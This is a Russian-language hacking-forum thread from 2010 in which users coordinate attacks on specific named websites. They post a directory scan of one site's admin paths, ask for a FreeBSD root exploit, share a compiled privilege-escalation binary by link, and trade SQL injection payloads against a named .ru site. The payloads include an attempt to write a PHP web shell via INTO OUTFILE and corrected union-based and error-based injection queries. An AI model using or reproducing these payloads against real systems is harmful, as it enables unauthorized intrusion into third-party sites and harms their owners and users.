29.06.2010, 18:29
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
http://brahmos.com
гдэ собстнэ админка?
спс.
|
|
|
29.06.2010, 18:59
|
|
Познающий
Регистрация: 28.06.2010
Сообщений: 91
Провел на форуме:
20501
Репутация:
5
|
|
Сообщение от ZARO
http://brahmos.com
гдэ собстнэ админка?
спс.
попробуй http://brahmos.com/ControlPanel/
|
|
|
|
29.06.2010, 19:04
|
|
Познающий
Регистрация: 24.06.2010
Сообщений: 95
Провел на форуме:
26362
Репутация:
1
|
|
Сообщение от 547
2 Iggy
Я посмотрел версию в исходниках админки, как ты написал в своем посте (site.com/administrator), но твой способ LFI не работает на этом сайте почему-то...(404 ошибка)
ну это понятно,ты выяснил что джумла 1.5.
x
но это еще не все, тебе надо теперь выяснить бета это или какой версии релиз?
но неполучится у тебя это зделать нету необходимых файлов чтобы посмотреть версию
да и параметров которые я указывал,у тебя они вообще отсутствуют на сайте,так что...
1.5.0 Release Candidate 3
* @version $Id: configuration.php-dist 8946 2007-09-18 14:26:22Z louis $
1.5.0 Release Candidate 2
* @version $Id: configuration.php-dist 8290 2007-08-01 14:03:11Z jinx $
1.5.0 Release Candidate 1
* @version $Id: configuration.php-dist 7740 2007-06-13 21:01:25Z laurens $
1.5.0 Beta 2
* @version $Id: configuration.php-dist 6691 2007-02-21 09:29:26Z Jinx $
1.5.0 Beta
* @version $Id: configuration.php-dist 5361 2006-10-07 19:21:08Z Jinx $
Благодарю.
Вот еще подскажи - разумно ли брутить админку на этом CMS? (интересует почему именнонет/да)
Разверни ответ, если не сложно...
|
|
|
|
29.06.2010, 19:41
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Iggy
Благодарю.
Вот еще подскажи - разумно ли брутить админку на этом CMS? (интересует
почему именно
нет/да)
Разверни ответ, если не сложно...
не подскажу,потому как не пробовал брутить админки...
|
|
|
|
29.06.2010, 19:49
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Всем привет!
Подскажите root сплойт на:
FreeBSD *.com 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Wed May 27 04:46:55 MSD 2009 root@:/usr/obj/usr/src/sys/ISPSYSTEM amd64
Server software: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8e DAV/2 PHP/5.3.2
Loaded Apache modules: core, prefork, http_core, mod_so, mod_authn_file, mod_authn_dbm, mod_authn_anon, mod_authn_default, mod_authn_alias, mod_authz_host, mod_authz_groupfile, mod_authz_user, mod_authz_dbm, mod_authz_owner, mod_authz_default, mod_auth_basic, mod_auth_digest, mod_file_cache, mod_cache, mod_disk_cache, mod_dumpio, mod_reqtimeout, mod_include, mod_filter, mod_charset_lite, mod_deflate, mod_log_config, mod_logio, mod_env, mod_mime_magic, mod_cern_meta, mod_expires, mod_headers, mod_usertrack, mod_setenvif, mod_version, mod_proxy, mod_proxy_http, mod_ssl, mod_mime, mod_dav, mod_status, mod_autoindex, mod_asis, mod_info, mod_suexec, mod_cgi, mod_dav_fs, mod_vhost_alias, mod_negotiation, mod_dir, mod_imagemap, mod_actions, mod_speling, mod_userdir, mod_alias, mod_rewrite, mod_php5, mod_ispmgr
Disabled PHP Functions: none
Open base dir: /home/vice/data:.
cURL support: no
Supported databases: MySql (5.1.47)
Readable /etc/passwd: no
Readable /etc/shadow: no
Userful: gcc, cc, ld, make, perl, tar, gzip, bzip2, nc, locate
Danger: ipfw
Downloaders: fetch
|
|
|
|
29.06.2010, 20:27
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от ZARO
http://brahmos.com
гдэ собстнэ админка?
спс.
Поищи тут админку!
» http://brahmos.com/.htaccess HTTP 403 Forbidden
» http://brahmos.com/.htconfig HTTP 403 Forbidden
» http://brahmos.com/.htpasswd HTTP 403 Forbidden
» http://brahmos.com/archive/ HTTP 200 OK
» http://brahmos.com/backoffice/ HTTP 200 OK
» http://brahmos.com/cgi-bin/ HTTP 401 Authorization Required
» http://brahmos.com/ControlPanel/ HTTP 200 OK
» http://brahmos.com/config/ HTTP 200 OK
» http://brahmos.com/download/ HTTP 200 OK
» http://brahmos.com/downloads/ HTTP 302 Found
» http://brahmos.com/error/ HTTP 403 Forbidden
» http://brahmos.com/gallery/ HTTP 200 OK
» http://brahmos.com/images/ HTTP 200 OK
» http://brahmos.com/login/ HTTP 200 OK
» http://brahmos.com/style/ HTTP 200 OK
» http://brahmos.com/test/ HTTP 200 OK
» http://brahmos.com/content/ HTTP 200 OK
» http://brahmos.com/favicon.ico HTTP 200 OK
» http://brahmos.com/icons/ HTTP 200 OK
» http://brahmos.com/index.html HTTP 200 OK
» http://brahmos.com/log/ HTTP 200 OK
» http://brahmos.com/login.php HTTP 200 OK
» http://brahmos.com/manual/ HTTP 200 OK
» http://brahmos.com/sitemap.html HTTP 200 OK
» http://brahmos.com/test.php HTTP 200 OK
» http://brahmos.com/webmail/ HTTP 302 Found
|
|
|
|
29.06.2010, 20:54
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
2IMMORTAL_S
Попробуй /threadnav160377-1-10.html
|
|
|
|
29.06.2010, 21:19
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
to wkar: сп, я пробовал уже его... что-то не сработал.
Пакет не сработал.. делал в ручную.. program.c нормально скомпилился, а вот env.c при компиляции выдал ошибки(какие точно не помню), но файл откомпиленный появился.
Народ, что посоветуете?
|
|
|
|
29.06.2010, 21:38
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\' into outfile \'/home/buddhatour/data/www/buddhatour.' at line 1
запрос:
PHP код:
[COLOR="#000000"]http://www.buddhatour.ru/new/?link=1+union+select+'[COLOR="#0000BB"][/COLOR]'+into+outfile+'/home/buddhatour/data/www/buddhatour.ru/e.php'[/COLOR]
Подскажите, где ошибка?
ПС
Мой енв скомпленый под 7.2 http://multi-up.com/297353 пашет в папке /tmp/ |
|
|
|
29.06.2010, 22:09
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от wkar
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\' into outfile \'/home/buddhatour/data/www/buddhatour.' at line 1
запрос:
PHP код:
[COLOR="#000000"]http://www.buddhatour.ru/new/?link=1+union+select+'[COLOR="#0000BB"][/COLOR]'+into+outfile+'/home/buddhatour/data/www/buddhatour.ru/e.php'[/COLOR]
Подскажите, где ошибка?
ПС
Мой енв скомпленый под 7.2 http://multi-up.com/297353 пашет в папке /tmp/ 1. Подобрать кол-во полей, а не пытаться сразу лить шелл
Код:
http://www.buddhatour.ru/new/?link=1+union+select+1,version(),3,4+limit+1,1--+
или так:
http://www.buddhatour.ru/new/?link=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
2. file_priv=N, ни о какой заливке шелла через скулю здесь речи идти не может.
|
|
|
|
TEST SHARE BLOCK
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
